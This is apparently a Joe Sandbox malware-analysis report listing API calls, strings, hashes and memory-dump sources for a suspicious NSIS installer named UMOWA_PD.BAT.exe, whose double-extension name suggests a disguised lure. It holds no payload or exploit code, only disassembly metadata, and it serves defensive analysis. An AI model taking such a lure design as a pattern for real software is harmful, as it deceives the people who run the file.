                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                    • String ID: 1033$916$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\UMOWA_PD.BAT.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                    • API String ID: 1813718867-965031739

                                                                                    Control-flow Graph

                                                                                    • Graph omitted; first node 4056e5-405700
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                    • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                      • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                    • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                    • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                    • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                    • CreatePopupMenu.USER32 ref: 00405972
                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                    • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                    • EmptyClipboard.USER32 ref: 00405A0D
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                    • CloseClipboard.USER32 ref: 00405A68
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    APIs
                                                                                      • Part of subcall function 6FE212BB: GlobalAlloc.KERNELBASE(00000040,?,6FE212DB,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212C5
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FE21D2D
                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 6FE21D75
                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 6FE21D7F
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE21D92
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE21E74
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE21E79
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE21E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE22068
                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 6FE22222
                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 6FE222A1
                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 6FE222B2
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 6FE2230C
                                                                                    • lstrlenW.KERNEL32(00000808), ref: 6FE22326
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 245916457-0

                                                                                    Control-flow Graph

                                                                                    • Graph omitted; first node 405c2d-405c53
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C56
                                                                                    • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C9E
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC1
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC7
                                                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CD7
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-2576647971
                                                                                    • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                    • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                    • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                    • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE

                                                                                    Control-flow Graph (graph not preserved; first basic block at 00401774)
                                                                                    APIs
                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,00435000,?,?,00000031), ref: 004017B5
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00435000,?,?,00000031), ref: 004017DA
                                                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                      • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                      • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 00405613
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp$C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll$Call
                                                                                    • API String ID: 1941528284-2922160740
                                                                                    • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                    • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                    • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                    • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                    • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp$X_B
                                                                                    • API String ID: 2295610775-3215270107
                                                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                    • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                    • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                    • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                    • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                    • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                                                    Control-flow Graph (graph not preserved; first basic block at 00403FA1)
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                    • ShowWindow.USER32(?), ref: 00403FFD
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                    • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                    • DestroyWindow.USER32 ref: 0040403C
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                    • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                    • GetDlgItem.USER32(?,?), ref: 0040413A
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                    • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 121052019-0
                                                                                    • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                    • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                    • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                    • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

                                                                                    Control-flow Graph (graph not preserved; first basic block at 00403BF3)
                                                                                    APIs
                                                                                      • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                      • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                    • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,00434000,00008001), ref: 00403C74
                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76E63420), ref: 00403CF4
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403D5B
                                                                                      • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                    • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                    • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-3228750522
                                                                                    • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                    • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                    • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                    • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,00000400), ref: 004030AF
                                                                                      • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 00406015
                                                                                      • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 004030FB
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\UMOWA_PD.BAT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-1551916588
                                                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                    • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                    • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 4024019347-4169018671
                                                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                    • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                    • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                    • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 00405613
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll
                                                                                    • API String ID: 2531174081-3798749991
                                                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                    • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                    • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                                      • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                    • String ID: 9
                                                                                    • API String ID: 163830602-2366072709
                                                                                    • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                    • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
